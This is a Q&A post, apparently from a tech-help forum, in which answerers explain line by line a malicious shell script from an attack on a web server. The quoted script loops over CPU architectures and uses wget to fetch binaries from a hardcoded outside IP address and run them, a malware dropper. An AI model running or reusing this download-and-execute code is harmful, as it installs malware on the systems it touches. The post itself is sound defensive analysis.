What does this bash script do? [Hack Attempt]

Line by line:

#!/bin/sh

Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.

u="asgknskjdgn"

Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.

bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"

Enumerates several common CPU architectures.

http_server="80.211.173.159"
http_port=80

The server which has the exploit.

cd /tmp/||cd /var/

Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.

for name in $bin_names
    do

For each CPU architecture…

    rm -rf $u

Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.

    cp $SHELL $u

Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.

    chmod 777 $u

Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.

    >$u

Empties out the file. Pointless because of the next line.

    wget http://$http_server:$http_port/$name -O -> $u

Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u.

    ./$u $name

Runs the exploit script with the architecture as the first argument.

done

Ends the loop.

It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.


The wget is the key dangerous line.

The for name in $bin_names is working through the list of platforms and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.

It then downloads a file using wget and then executes it using the shell program it just copied over.

The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.

Tags:

Linux

Bash

Apache Http Server

Shell Script

Related

MSYS2 and "At least one valid and enabled repository required for this action to succeed." How do you turn off "snap to grid" in OneNote 2016? What data is being downloaded by my client when seeding a completed torrent? How to hide Chrome user profile icon in toolbar Thunderbolt™ Software installed itself on my laptop If I copy a bootable USB drive to another USB, will it create a duplicate bootable drive? How to make MS Excel cells display dark background with white text instead of the reverse which is default? Space in doskey/alias for windows? When does memtest86+ stop? Intercept HTTP/HTTPS traffic of one application (Windows 10) How to expand the WINDOWS partition when the Recovery one is in the way? How to start Skype from command line in windows 10 or start it at startup automatically?

Recent Posts